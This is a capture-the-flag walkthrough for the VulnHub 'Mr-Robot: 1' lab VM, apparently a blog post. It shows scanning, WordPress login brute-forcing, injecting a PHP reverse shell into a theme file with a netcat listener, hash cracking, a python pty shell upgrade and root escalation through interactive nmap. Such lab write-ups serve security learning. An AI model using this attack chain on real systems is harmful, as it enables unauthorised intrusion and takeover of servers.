[VULNHUB] Mr-Robot: 1

Mr. Robot is a VulnHub VM inspired by the homonym TV series. The goal is to find 3 .txt keys located in 3 different positions.

FLAG 1

The first thing to do is to perform an nmap scan to see which ports are open:

nmap 192.168.1.11

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-07-31 17:15 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00091s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
443/tcp open https

Nmap done: 1 IP address (1 host up) scanned in 4.81 seconds

So there is a website with both HTTP and HTTPS protocol.
Opening 192.168.1.11 into the browser I can see a semi-realistic interactive shell where I can watch some Mr. Robot videos and other stuff. Perform a scan with nikto to see if the website has some interesting things for me:

nikto -h 192.168.1.11

This is what nikto revealed to me:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.11
+ Target Hostname: 192.168.1.11
+ Target Port: 80
+ Start Time: 2016-07-31 17:39:46 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ /readme.html: This WordPress file reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ 7535 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2016-07-31 18:01:47 (GMT2) (1321 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

First of all I notice that this site is built with WordPress and opening /readme.txt I discovered that the version is 4.3.5, which is bugless at the moment. Let’s do a check on /robots.txt too:

User-agent: *
fsocity.dic
key-1-of-3.txt

Awesome, I found the first key! Opening /key-1-of-3.txt I am able to see the content of the file: 073403c8a58a1f80d943455fb30724b9. Now I can skip to the second key.

FLAG 2

There is another interesting file listed in robots.txt, it is a dictionary file. Download it, it can be useful to bruteforce WordPress login password, but before that I need to find a valid user name. So I navigate to /wp-login and I started to try some possible user names. Thinking to the TV series I tried to use the name of the main character (elliot) and a random password, and it worked! In fact WordPress login page returned an error message:

ERROR: The password you entered for the username elliot is incorrect. Lost your password?

That means that the user name exists but I need to find a valid password. I can use the dictionary file downloaded 2 minutes ago, but first of all I check the content of it:

cat fsocity.dic

There are a lot of strings but I want to do another check: I want to order alphabetically the dictionary:

sort fsocity.dict

After this command I noticed that there are a lot of strings that are repeated a lot of times, so I need to remove the duplicated ones:

sort fsocity.dic | uniq > fsocity.txt

With the previous command I also saved the new dictionary file with a .txt extension. Now I can try to bruteforce the password of the user name elliot with Burpsuite. First of all I intercepted the POST login request with the proxy, then I sent the request to the Intruder and I loaded fsocity.txt as password payload. After some minutes and ordering the requests by response length, I found the elliot password: ER28-0652. Now I can login but to find the second key maybe I need a shell on the web server. So navigating into WordPress menu to Appearance->Editor I can edit 404.php and inject a PHP reverse shell, I used this one (remember to edit line 49 and 50 with your settings). Now I listen for the incoming connection:

sudo nc -lvp 1234

Then I navigate to /something and the reverse shell is opened. Now browse to /home and I noticed /robot user folder. I opened it and I found 2 files:

key-2-of-3.txt
password.raw-md5

Unfortunately I can’t see the key file because I don’t have permissions to do it but I can see the content of the second file:

cat password.raw-md5

Which is:

robot:c3fcd3d76192e4007dfb496cca67e13b

So I need to crack the MD5 hash of the robot‘s password. I just use HashKiller to crack it, just paste the MD5 string and the password is cracked instantly. So the robot‘s password is abcdefghijklmnopqrstuvwxyz. Now I can login with robot user from the shell, but first I need to get a tty. I can use Python to achieve this:

python -c 'import pty; pty.spawn("/bin/bash")'

Now that I have a tty shell I can login as robot:

su robot

Use the cracked password and navigate into /home/robot. Now I can take the second key:

cat key-2-of-3.txt

Which is 822c73956184f694993bede3eb39f959.

FLAG 3

Now there is only one remaining key. Maybe I need to check into root directory of the web server but I don’t have permissions with robot‘s account, so I can try to escalate privileges: I used LinEnum. First of all I download the script into /tmp folder:

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Then make the script executable:

chmod +x LinEnum.sh

And finally run it:

./LinEnum.sh

At the end I noticed this section of the output:

### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/local/bin/nmap
/usr/bin/gcc

There is nmap installed into the system and if I can run it, maybe I can get an interactive shell and execute command as root. So execute nmap:

nmap --interactive

Yes! I got an interactive shell, now just use:

!sh

Now I have a shell logged as root. Navigate into /root and list the files. There is the latest key, just show it:

cat key-3-of-3.txt

The 3rd key is 04787ddef27c3dee1ee161b21670b4e4 and the CTF is completed!

Advertisements
[VULNHUB] Mr-Robot: 1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s